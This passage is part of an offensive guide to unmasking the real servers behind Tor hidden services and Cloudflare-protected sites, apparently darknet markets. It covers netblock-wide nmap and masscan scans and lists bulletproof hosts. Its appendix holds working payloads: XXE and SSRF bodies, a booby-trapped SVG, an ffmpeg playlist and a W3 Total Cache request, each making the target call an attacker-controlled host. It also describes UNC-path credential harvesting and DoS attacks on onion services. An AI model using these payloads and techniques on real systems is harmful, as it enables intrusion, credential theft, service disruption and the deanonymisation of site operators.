The important part is -iL netblocks.in.txt. It'll take some time but it's quite possible to run nmap completely automatically and let it chew through every potential ip address looking for the site you're looking for using SSL subject and servername requests to try to find an exact match. Make sure you save your data. There's another port scanner called masscan that you might want to try. It's almost exactly the same speed as nmap if you need to scan every port on a host, but if you only want to scan ports 80, 22, or 443 then it's so much faster your head will spin.
Compare:
time nmap -sS -p80 -PS80 200.129.0.0/16
time masscan -p80 200.129.0.0/16 --rate 5000
The other cool thing about masscan is it has it's own tcp/ip engine and can run through VPNs that don't have routing setup. I'm not going into it but it's really useful if you're using a VPN provider from a hosted virtual machine.
You can take this sort of search even further. It's quite possible to scan entire countries. Many of them are considerably smaller than large cloud providers like AWS. If you look around you can find lists of netblocks per country in cidr format. Masscan supports -iL like nmap does, so you can use the list of netblocks as your input for the scanner. In ALL THESE CASES make sure you save your output to a file!!!!!!
- Bulletproof webhosts
If you've scanned a tor site and it has SSH open you can use nmap (both over tor and while scanning a hosting company) to try to find a fingerprint that matches both. Tor sites almost never have SSH open, but I need something to be uniquely identifiable to make this demonstration. Without a way of verifying onion sites other than looking at it, being at this part of the document is not a sign of success. Regardless there's a fairly short and sweet list of hosting companies that are shady enough to host darknet markets. Cloudflare sites are generally hosted almost anywhere normal.
Shady hosting companies like this are known as "bulletproof hosting companies" and are way more popular for tor hidden sites than average. Some specialize in spam, others in malware, piracy, etc. Also, for some reason you can find quite a few vendor shops (including really big ones) hosted by GoDaddy for some reason. In one case I found a huge well known vendor site being run by GoDaddy - as far as I could tell. In that case what was possibly their real ip address was exposed by a PDF invoice download form that took the data from a server hosted by GoDaddy. It doesn't mean for sure they're hosted there, but there's a really good chance they are.
If you are thinking of setting up a hidden site I really wouldn't use a normal hosted website like GoDaddy, The Planet or HostGator. People that use big hosting sites should expect close to no privacy. I have noticed that tons of hidden websites use CDNs (content delivery networks). Figuring out what CDN a hidden site uses generally isn't that useful, but it's nice to know.
- Hosting companies known for hosting drug related content
Here's a few popular shady-ass hosting companies that tend to host more than a normal share of DNMs and vendor sites. For some reason GoDaddy is popular for vendor sites as well. It's huge, you have no privacy, and I have no idea why you'd put your site there. Cloud providers like AWS are way too big to scan. Lastly, a few of these hosting providers try to use or lease out ip address space that doesn't have their name on it (specifically so you can't scan them for sites). That's not that common until you're talking about places like OrangeWebsite or CyberBunker (busted). Here's a somewhat outdated (2018?) list of popular hosts from when the crimeflare hack still worked:
www.orangewebsite.com (biggest one)
Icenetworks Ltd. (I think this is actually orange website) - https://bgp.he.net/search?search%5Bsearch%5D=Icenetworks+Ltd.&commit=Search
www.hawkhost.com
godaddy.com
knownsrv.com
ititch.com
singlehop.com
There's always one or two tiny onion hosting companies that are popular for hosting only onion sites and they're usually quick to check out. They also tend to die a lot by being hacked, for example Daniels Hosting, Freedom Hosting, and Freedom Hosting II have all been hacked out of existence. If they have replacements you should check them for your target site.
- Brute forcing vhosts (and why it's a dead end)
Nmap has a script that'll allow you to search for domains on web servers from a list. If you have a target site and list of associated sites or subdomains you can check a number of web servers to find target using a vhost. There are two problems. The first problem is tor site operators might not be using a standard port number (like 80 or 443). The second and less expected problem is around 1 in 10 websites will respond to a standard http request for _any_ vhost and either send you to the same site, or redirect you with a 301/302 http redirect or something that'll screw up your search. If you scan http (non SSL) sites for vhosts expect to see large numbers of false positives.
Here's how to run this script anyway. subdomains-found.txt is stuff you've discovered, and the main site is just an argument to the script I've called target-site.com. Netblocks.txt is the netblocks you've selected to search
nmap -sS -p80 -T5 --open --script=http-vhosts --script-args="http-vhosts.domain=target-site.com,http-vhosts.filelist=subdomains-found.txt" -iL netblocks.txt.
It's one of the few ways you can *try* to locate an onion site without an SSL or SSH fingerprint which you'll generally never have. Unfortunately the high rate of false positives makes it pretty useless.
--== Mapping the site structure
I've mentioned mapping the site before. It doesn't have a good rate of success on it's own, however if you explore and map out the site it'll give you a lot of additional information that you'll probably find useful anyway - forms, things that send email, scripts that were installed and forgotten about, addresses and phone numbers, places to upload things or store data, information about image hosting and CDNs, subcontractor names, company names, email addresses, the occasional raw ip address or hostname, and subdomains that you never would have guessed. This isn't going to be a guide on how to use dirb666, wfuzz, etc.
Obvious defensive note: If you're running ANY sort of a darknet site you really need to have your own small network, virtualized, real, whatever. Your web servers can not know their real ip addresses and should at the very least be behind some sort of NAT, SNAT, or other port forwarding/address translation.
If you haven't found the site yet, doing this sort of mapping the site through cloudflare is extremely annoying. Doing this sort of thing to a tor site is a lot more straightforward, but proxychains tends to be unstable so neither is fun at all.
The quality of your wordlists is really important. If you're scanning through cloudflare or precariously tunneling your requests through tor's socks proxy, you don't want to waste a lot of requests. You can do things like search for directories for / (non-recursively) and then use a wordlist of php files to find php files in the directories that are found. You can always scan directories you've found again. Most darknet sites are written in PHP and while anything can be hidden behind cloudflare but it's usually a CMS of some sort.
Tools for mapping site structures:
robots.txt and sitemap.xml
Burp Proxy (in proxy mode or Discover Content under the engagement tools menu)
OWASP Zap (I assume, it really should be able to)
dirb222 - my personal favorite
wfuzz - syntax is weird but its more flexible than dirb222. It also requires way more memory to run. So, the first parameter you're fuzzing is called FUZZ, the second one (in order that you defined it on the cli) is FUZ2Z, etc.
Google/yandex/others search queries like - site:site-here.com, inurl:, intitle:, filetype:, etc.
- Javascript files
Javascript files that aren't generic ones tend to have a lot of urls in them. You can then see what these urls have to do with the main site. Most of them won't be relevant but it's really an interesting place to look. As an added plus you can get details about how to use valid urls. You can also use cellphone apps to get similar lists of URLs but I haven't seen a hidden site with an Android app yet.
Tools:
JSScanner - https://github.com/dark-warlord14/JSScanner.git - https://securityjunky.com/scanning-js-files-for-endpoint-and-secrets/
- APIs
If you find some sort of API (maybe referenced to in javascript, maybe you just found a path like /v1/ or /api) you can brute force the url with a wordlist specifically made for APIs. If you're lucky it'll be obvious how to get it to work, since the average API is a ball of interesting information that, if you poke it correctly, will spew out really irrelevant details about something.
A lot of sites have APIs somewhere. Even darknet sites usually document their API and will provide it to interested parties. Lastly, APIs almost always provide a lot more information than a normal web page.
- Status Pages and Similar Mistakes
Most web servers have a built in status page that's automatically only accessible from localhost. The Apache status page is incredibly informative and lists off every ip address that's connected to that daemon. Nginx has one too but it's only a count of the number of connections. Someone has to have screwed up pretty badly if a hidden site has one of these urls, but it is possible to do accidentally. One way a status page could be accidentally exposed is if there's software like Varnish Caching Server running on the same machine - it's a piece of software that configurably caches web pages, so if it's running on the same server then all your connections are being proxied through localhost (unless they're cached).
There's a somewhat similar problem on websites hosted by servers running cPanel. While cPanel improves server security in many ways, it installs some paths and a cgi directory that get are accessible by every site managed by the software.
URLs:
http://yoursite.com/server-status - Apache status page, visible from localhost (or a non blind SSRF)
http://yoursite.com/status - Nginx status page, but it doesn't have that much information
http://yoursite.com/cpanel - This url will redirect you to the ip address of the server port 2082
http://yoursite.com/whm - This is another part of cPanel, and redirects you to port 2083
Example:
----- Let's go to sitename.com/cpanel and see what happens -----
$ curl -k -v https://sitename.com/cpanel
* Trying 5.253.28.68:443...
* Connected to sitename.com (5.253.28.68) port 443 (#0)
> GET /cpanel HTTP/1.1
> Host: sitename.com
> User-Agent: curl/7.74.0
> Accept: */*
>
< HTTP/1.1 301 Moved Permanently
< Date: Sat, 27 Feb 2021 04:33:04 GMT
< Server: Apache/2.4.39 (Unix) OpenSSL/1.0.2k-fips
< Location: http://5.253.28.68:2082/ <----- tada!
< Content-Length: 232
< Content-Type: text/html; charset=iso-8859-1
<
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://5.253.28.68:2082/">here</a>.</p>
</body></html>
* Connection #0 to host sitename.com left intact
-----
This also shows how cPanel keeps all the software extremely up to date. As of right now most people are still using OpenSSL/1.0.1, and I didn't know 1.0.2x had even been released.
- Other loot
The whole point of mapping a website like that is you'll inevitably find something useful or interesting. See what you'll find! Some example unexpected finds could be:
- old contact info
- test scripts of various sorts
- hidden registration or email pages
- admin/manager interfaces
- directories like "database" "upload" or "backup"
- images with location (exif) info
- Scripts that might expose data. Have you seen Django's 404 page with full debugging enabled?
- Text files like readme.txt and changelog.txt
--== Appendix: Misc exploits, misconfigurations and tools
- Wordpress upload directory and CDNs
Every Wordpress site has a directory called https://sitename.com/wp-content/uploads/. It's not that unusual to be able to see all the files in that directory, and a number of them tend to be sensitive. Sometimes you'll even find backup files and other really random stuff with information about the website.
There's something else useful about a Wordpress upload directory - pictures! They're kept in an easily guessable format: https://blogurl/wp-content/uploads/YYYY/MM/DD/ so it's really easy to find the folders with wfuzz. From there you can see if any of them have exif data! Non-stock photos of offices, staff, office parties, etc could potentially give you the exact coordinates of their office. If you're running a diet pill site you probably really don't want people knowing where you work. (I'd guess it's to make them hard to sue - the last diet pill site I tried to locate had obviously hired pen-testers to make sure they weren't leaking their location. The best I could find at the time was a contact form from a long time ago that had a PO box on it and some stuff like that).
A CDN (content delivery network) is basically a fancy hosted version of an upload directory. In my opinion there's not too much of a point in figuring out where a CDN is located or actually called (since it's always hosted by someone else), but if you can browse through it it's pretty similar to a Wordpress upload directory. A lot of large Wordpress sites use CDNs for their upload directory, then use a reverse proxy (one with a hard coded destination) to integrate it with the site. You can tell because the error messages for missing files or directories you can't list the contents of will suddenly look very weird. Google the message and for what little it's worth you'll know where they host their files. There's other ways of identifying (and finding) CDNs but as far as locating sites go they aren't any more useful than the files they host.
- changelog.txt
A lot of sites install software that leaves a file named changelog.txt sitting around. A changelog is a file with a quick note explaining the changes that have been made since the last version. Even if it doesn't say the version of the software there will be something like a commit id - its a big hexadecimal thing like "b2036b102bc87d7ȃ99b9d17e1e". Wordpress leaves a readme.html file sitting around as well, and wpscan has a few hacks for getting it's exact version.
- Google Image Search
Google image search can search for pictures based on what they look like, using some kind of slightly dumb AI. You can't do this from your cellphone. Go to images.google.com on a computer, click the black camera icon and upload the picture you'd like to find online. Try searching for a company logo or something like that. You can also add keywords to help Google's AI out.
- Burp Collaborator Everywhere plugin
Someone at Portswigger wrote a plugin called "Collaborator Everywhere" that's specifically for unmasking hidden sites. I only found it yesterday. Burp Collaborator is kind of like http://pingb.in except it's hosted on your machine. If you don't have the paid version of burp that lets you load extensions then _do_not_ spend the money - most burp extensions are not particularly useful. In this case I tried the plugin once, then it wouldn't load after the initial installation. In addition to that Burp Collaborator kept on mis-detecting my ip address somehow. I might write my own script for doing the exact same thing where you give it an http(s) request in a text file - I thought it'd probably be more effective if it tried one parameter or header at a time rather than quite literally all of them at the same time.
The paper can be found here: https://portswigger.net/research/cracking-the-lens-targeting-https-hidden-attack-surface (TL;DR, it sticks urls in nearly every parameter and adds a bunch of HTTP headers that also have urls in them. It's still worth reading.)
Related urls:
https://digitalforensicstips.com/2017/11/using-burp-suites-collaborator-to-find-the-true-ip-address-for-a-onion-hidden-service/
- XML input forms
XML's specification allows for a type of exploit called an XXE (External Entity Attack). This type of attack can be used to do SSRF and LFI by specifying URLs or files in the header of XML input. My experience with XXEs are limited since XML based forms are far more common in the Microsoft world. The Linux ecosystem uses specifications like JSON and Protobuf quite a bit more (though XML forms are used as well). There's entire API protocols that are based on XML input, like SOAP APIs.
To prevent this section from being really confusing, I should explain that an XXE is a type of vulnerability that abuses XML features to read files or connect to websites (aka an SSRF). A SSRF is anything on a site you can get to connect to a URI you specify. If you're trying to steal cloud credentials, then you also need to get the response back somehow as well.
This XML functionality exists so that it can be extended into other document types. Fortunately people have gone nuts with this functionality and there are millions of XML derived file formats, network protocols, etc. Almost all XXE attacks abuse DOCTYPE - it's like a header to an XML file that allows it to have new variables and data types (and possibly other things I'm not aware of). You can abuse this header by telling it that it's document specification file is on a remote website, or in /etc/passwd, or something like that.
There's a variation on this attack that is a denial of service attack called the "Billion Laughs Attack" that's worth looking up if you're into crashing things. Because of the numerous security issues with using the XML specification exactly as written a lot of XML libraries ignore some of this stuff, and what is or isn't ignored depends on the software, programming language, and occasionally if it actually needs the abusable features.
The most effective way of using a XXE check like XXE-POST-body.txt is to try submitting the XXE header to the beginning of an XML form, right after the xml version, and then keep the rest of the data that was going to be submitted as a parameter. A few things (like MS Sharepoint servers) will let you convert one type of form (like multipart mime, json, etc) to an XML form if you just change the Content-Type HTTP header in your request to "application/xml". Lastly, a lot of vulnerability scanners simply submit the XXE check to the form without actually filling in the parameters the form expects so that must work sometimes. It makes sense - anything parsing XML that doesn't ignore the headers would probably have read them before it could read the data.
The first line (xml version and optional encoding) is only needed if you're sending the XXE test without any other form data. Otherwise just stick the last 3 lines after the xml part of a request and before whatever else was going to be sent. Don't forget to adjust your content length! There's a bash command "wc -c filename" that'll tell you how many characters are in a file, then add two for the newlines at the end of your HTTP request (four if you use \r\n).
----- XXE-POST-body.txt -----
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [<!ELEMENT foo ANY>
<!ENTITY xxe SYSTEM "http://youripaddresshere/">]>
<foo>&xxe;</foo>
-----
Just like with the Wordpress exploit, you can save yourself having to manually construct a http(s) request by using curl. That way curl does most the details like the size of the data. Like the other variations on an SSRF attack, you need to have a listener that's reachable.
Simple example without the parameters for a form:
curl -k -i -X POST http://target-site-here/api/v2/submit -H "Content-Type: application/xml" -H "Accept: application/xml" --data "@XXE-POST-body.txt"
I have a few more examples and the documents that I've linked to have many many more, as well as some really crafty tricks and tactics for getting the data back to you. Or evading defenses - like you can evade whitelists with urls like www.allowedtoconnect.com@yoursite.com . Non-blind SSRFs can be used against "metadata servers" that cloud services run that sometimes include credentials but it's outside the scope of this document - for our purposes blind SSRFs are just fine for locating servers.
----- ALT-SSRF-POST-body.txt -----
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foobar SYSTEM "http://youripaddresshere/mal.dtd">
-----
A different way of doing the above:
----- ALT2-SSRF-POST-body.txt -----
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE root_element PUBLIC "-//foobar//a" "http://youripaddresshere/mal.dtd">
-----
Some of the urls in an XML document are not useful, like (afaik) the links to w3 specifications don't actually contact w3; they're more there for your edification. I think.
Papers:
https://www.gosecure.net/blog/2019/07/16/automating-local-dtd-discovery-for-xxe-exploitation/ - filled with weird things you can do to XML libraries/parsers/etc. Some of the things they demonstrate are completely depraved. If you can get data back from the XXE/SSRF you should try querying localhost's status page. I mentioned the urls for Nginx and Apache above.
https://2013.appsecusa.org/2013/wp-content/uploads/2013/12/WhatYouDidntKnowAboutXXEAttacks.pdf - This paper also has tons of good information on XXE attacks. It's set of tricks is very different from the first paper, and it also mentions other protocols and file formats which can be used to trigger XXE attacks.
- SSRF exploits that work via file conversion utilities
Nearly any website that lets you upload an image will both resize it (sometimes to make a thumbnail) and remove the exif data. So while researching details for this paper, I've come across a lot of miscellaneous file based exploits. Video upload sites almost always need a picture from the beginning of the video, and PDF converters are also notorious for having issues including SSRFs. Occasionally you'll even see websites converting things like word documents. It's not very common, but you can actually run OpenOffice in headless mode and use it to convert document formats on a website. It's kind of buggy and crashed a lot so I don't think you'll see people doing that too frequently.
The purpose of this section is basically to list a number of potentially useful file formats with known vulnerabilities.
::SVG image format + ImageMagick (CVE-2016-1897 & CVE-2016-1898, not fixed)
An SVG file is an image, but it's a vector based image not a normal picture. Vector graphics are kind of like the old MS Paint where you drew with lines and circles and stuff. For some reason it allows you to load text, other svg files, or textures from hyperlinks using it's "xlink:href" attribute. The Mozilla developer page warns that xlink:href is unlikely to be supported as a feature for much longer, but I've tested it on a very recent version of ImageMagick and it still works. It probably works on many other pieces of software as well, but if you can upload a .svg file you may as well upload a .php file or something like that.
This exploit code is from https://infosecwriteups.com/my-first-bug-blind-ssrf-through-profile-picture-upload-72f00fd27bc6
----- fakeimage.svg -----
<svg xmlns:svg="http://www.w3.org/2000/svg" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="200" height="200">
<image height="30" width="30"
xlink:href="https://youripaddress/pic.svg" />
</svg>
-----
I found a useful document called the "SVG SSRF Cheatsheet" that goes into getting your SVG file uploaded to the site as a different picture type and things like that. There's an extremely common cli image manipulation suite called ImageMagick that many sites use to change file formats and automatically make sure pictures are the correct size and resolution. ImageMagick and PHP's LibGD/LibGD2 libraries are the two most common things used to resize pictures on webservers.
ImageMagick is the only image conversion utility that uses the uploaded file's contents rather than filename or mime type to figure out how to process it, which is really pretty awesome. The vast majority of website upload scripts check the filename's extension and mime-type; it's kind of unusual for an upload script to actually check the file's contents. This means that if you upload your SVG file as someimage.png then ImageMagick will still treat it like a SVG and get exploit. ImageMagick also happens to be one of the two most popular ways of resizing image files online, along with PHP's LibGD/LibGD2 libraries. Incidentally the SVG file format turns out to have a really large number of places where you can put a URL, and the paper below has a list.
Paper: https://github.com/allanlw/svg-cheatsheet - List of places in the SVG specification where you can add a url
::FFMpeg
This exploit is extremely old and doesn't work on recent versions of ffmpeg. You can make a mp4 file that's actually a m4ua playlist that allows an SSRF through a macro. Similarly, you can make an HLS playlist that pretends to be an AVI file which is an even older exploit, so I didn't include it. The files that are the result of either exploit are nearly identical. The original exploits were actually to steal files, but if you really have no other vectors maybe this will work. This requires the copy of ffmpeg to probably be at least 5 years old.
Exploit from the SSRF Bible: https://repo.zenk-security.com/Techniques%20d.attaques%20%20.%20%20Failles/SSRFbible%20Cheatsheet.pdf
The Ubuntu discussion of the same bug: https://bugs.launchpad.net/ubuntu/+source/ffmpeg/+bug/1533367
You don't actually have to steal files if you don't want to:
----- ssrf.mp4 -----
#EXTM3U
#EXT-X-MEDIASEQUENCE:0
#EXTINF:10.0,
http://yoursite/
#EXT-X-ENDLIST
-----
This would be triggered by a vulnerable version ffmpeg using any of these files as input, for example "ffmpeg -i ssrf.mp4 blah.avi" or making a thumbnail out of the video.
Paper: https://hydrasky.com/network-security/exploiting-ssrf-in-video-converters/
::PDF Files
There's a lot of things that are slightly weird about PDF files. I'd like to start by mentioning that I overheard the CTO of a company I worked for discussing how you can pay Adobe for the ability to be notified when someone reads a PDF, for example a sensitive internal document. PDF files can have javascript embedded in them; that lead to absolutely huge numbers of heap overflow exploits a few years ago. I gather Adobe Reader had various kinds of functions that could be invoked by javascript in the same document? These days malicious MS Office files are far more popular since a lot of the Adobe Reader exploits have been patched and many MS Office exploitable features are in most of their non-cloud office products.
A lot of people don't know that PDF files can contain javascript. On top of that there's more than a few PDF conversion utilities with known vulnerabilities. In fact, one was just found in ImageMagick quite recently (2021). I apologize for mentioning that piece of software repeatedly, but it's both common and written by people with an obvious lack of interest in making it even vaguely secure (or in some cases even patching known vulnerabilities).
List:
https://www.exploit-db.com/exploits/49558 - PDFComplete UNC (2021), SSRF + creds!
https://insert-script.blogspot.com/2020/11/imagemagick-shell-injection-via-pdf.html - RCE, exploit is at the very bottom. It's more of a multistage ImageMagick exploit that uses a pdf vulnerability, but you could also exploit a script that uses ImageMagick to turn encrypted PDFs into image formats with a user supplied password. I've never seen that situation, but if you do see it it might be exploitable
https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Ben-Sadeghipour-Owning-the-clout-through-SSRF-and-PDF-generators.pdf - how to pwn some headless office software doing PDF conversion using a malicious iframe. It's towards the back. There's also a video of this on Youtube.
::Wordpress w3 total cache SSRF (just an SSRF, but it's brand new)
Since Wordpress is slow as fuck there are various page caches that save rendered copies of the site so it'll load faster. W3 Total Cache is one of the less popular but still used plugins.
----- yes it's a put request apparently -----
PUT /wp-content/plugins/w3-total-cache/pub/sns.php HTTP/1.1
Host: targetsite.com
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.80 Safari/537.36
Content-Length: 124
Content-Type: application/x-www-form-urlencoded
Connection: close
{"Type":"SubscriptionConfirmation","Message":"","SubscribeURL":"http://yourserverhere/"}
-----
::Things worth looking into
The number of file formats derived from XML files is enormous, and all sorts of other file formats have things that are either weird or obvious wrong with them. A MS docx file is basically a zip file full of xml files. This stuff doesn't have to be hard to test - find some random word processor and see if you can embed an image straight from a website. See if you can embed UNC paths to SMB shares where a program would expect a filename.
- Indexes to two frequently mentioned papers
::XML based SSRFs in various files and protocols:
https://2013.appsecusa.org/2013/wp-content/uploads/2013/12/WhatYouDidntKnowAboutXXEAttacks.pdf
List:
Data exfiltration via XXEs
Protocols supported by various XML libraries (note that the gopher was depreciated in 2012)
Some trick for having Java get files out of JARs, docx, and other zipped formats
Something about remote JARs idk what exactly. It has a red shell and something about pwnage
::A paper about SSRFs that includes a large number of exploits for common software
https://repo.zenk-security.com/Techniques%20d.attaques%20%20.%20%20Failles/SSRFbible%20Cheatsheet.pdf
List:
Finding SSRFs and protocols supported by web server software of different kinds
Response splitting
XML, OpenOffice, PDF
Abusing various libraries (a different list than the OWASP XXE paper)
PostgreSQL access
- Google dorking for stuff
it's always worth searching a website in google or yandex with stuff like microsoft documents and backup files:
(in google) site:somewebsite filetype:sql
Other file formats: mdb (microsoft database), doc, docx, xml, zip, bak, txt, pdf, ppt, myd/myi, tar.gz, tgz, swp, etc.
Useful search engine commands are site: inurl: intitle: 00..99 (range of numbers) and stuff like that. In addition, it's not a terrible way of looking for parameters that might have issues in a specific site. Google sometimes blocks this sort of thing, but there are lots of search engines and they all tend to use the same syntax for searches. Here's two search engine searches that might turn up vulnerablities:
site:somesite.com inurl:url= (most things will ignore the = unfortuntely)
site:somesite.com inurl:file=
site:somesite.com "Index of"
site:somesite.com intitle:Index
You can try to download jpg/jpeg files from the site and check their exif data. The onionscan tool introduced me to this trick. If you succeed this will give you the actual location at which the photo was taken. You can use google dorks (or just looking around) to find things like pictures of staff members. Also, if the site uses some sort of CDN you can browse through or has an image upload folder (like Wordpress), browse around and see anything that looks like it hasn't been processed too much. This sort of thing is more likely to work on small sites than major ones; things like forums and image sharing sites usually remove the exif data automatically.
Use google statements like "filetype:blah site:yourtarget.com" or "inurl:mdb site:yourtarget.com" to find specific document or file types via google on a site. Keep in mind that websites use a lot of stock photography, so ideally it should be a picture of the staff or something like that. Tools that will allow you to see exif data include exiftool, the Gimp, and millions of websites like https://exifinfo.org/. Some or all of the exif data is lost when the image is resized, but it's easy to check a lot of images.
- Misc networking attacks
Malicious HTTP Headers
You might recall that I discussed that one of the reasons that scanning for a specific vhost is nearly impossible is due to the large number of sites that'll blindly try to redirect you to whatever is in your Host: header. That sort of behavior is very common and occasionally it's an SSRF and not just a 301/302 http redirection. Unfortunately CloudFlare tends to remove extra http headers, so you'd need to test by hand what you can and can't slip through. Keep in mind CloudFlare gives 403 errors without a server version when it blocks your request, so it's extremely easy to figure out when it's interfering.
Additionally, modern websites frequently have some sort of load balancing. In the case of tor sites its usually something like onionrouter which was made with security in mind, but for CloudFlare sites you can sometimes trick the load balancer with malicious HTTP headers as well. There's even a few HTTP fields that are only used by proxies and load balancers that are worth trying to stick your ip address into.
I was wondering if you could use HTTP Reqeust Smuggling to fit some of these fields in? research needed????
Check for an open proxy
Your target is extremely unlikely to be a proxy. These requests are how you interact with a HTTP proxy, but please note that there's a huge difference between proxies and reverse proxies. Look them up, but the TL;DR is a proxy takes you where you specify, and a reverse proxy invisibly fetches data from another site due to the webserver configuration. The latter are frequently necessary as building blocks in modern web applications.
Proxy check one (ends with two newlines):
-----
GET http://youraddress:80 HTTP/1.0
-----
Another proxy check:
-----
CONNECT youraddress:80 HTTP/1.0
-----
Apparently this should work just as well:
-----
GET http://youraddress:80 HTTP/1.1
Host: youraddress:80
-----
- End User Attacks
I pretty much never try to attack end users because I know very little about windows. The non-fictional book "Kingpin" is worth reading and the real life protagonist used almost entirely client side attacks. There's a really large number of ways you can execute code via any non-cloud MS Office product, and it's due to the design supporting a number of completely obsolete features. Excel and Word in particular still allow for complex scripting and Excel still has the built in ability to execute other programs.
Additionally, some applications and document formats for Windows are prone to connecting outwards when a valid SMB URI is encountered, aka a Windows UNC (a UNC is any valid path on a windows computer. It can be "c:\win.ini" or it can be "\\attacker-lan\fakeshare\document.anyextension"). Since Windows will always try to silently log into remote shares invisibly with your username and password this type of attack will also cause credentials to be sent to your server. You can collect them with metasploit or Responder.py.
An example of a UNC path injection exploit is a recent Zoom (video chat software) exploit. If you put a link like \\1.2.3.4\madeupshare\foo.txt into chat it'd make it a blue URL, and anyone that clicked it would be forwarding their both their ip address and encrypted password to you. Many UNC path injection vulnerabilities don't require user interaction to work. There's another really popular UNC exploit that involves .lnk files that doesn't require that you actually click on the file for it to execute - you just need to have the target view the folder with the lnk file in it.
While hacking end users with trojans can really be an effective way of getting hard to get things like initial credentials and vpn information, it rarely goes unnoticed. People frequently remember the incident. If you get noticed, you're not just some faceless ip address on the internet. Also since the malware distribution techniques tend to be generic and require a few specific features, they're not hard to detect with antivirus. Before Adobe depreciated Adobe PDF Reader, exploiting it was a really popular way of performing end user attacks, but well over 90% of them required that javascript be embedded in the PDF (the PDF standard supports inline javascript btw).
- DoS attacks
I usually don't DoS stuff, but the actual tor node that forwards to the hidden service is known to be a weak link, especially for people using older versions of tor. There was a lot of discussion on Dread around a year ago regarding ways of configuring tor to withstand the impact of trying to overload it with circuits, so if you're defending a site you might want to read up.
Lots of standard website software have easy to stress out urls; like wp-cron.php in Wordpress, or search features. Search features are usually looking through a database of some sort, and that can easily be very computationally expensive, especially if you're really hammering it and making searches that return a lot of results.
Tool:
https://github.com/k4m4/onioff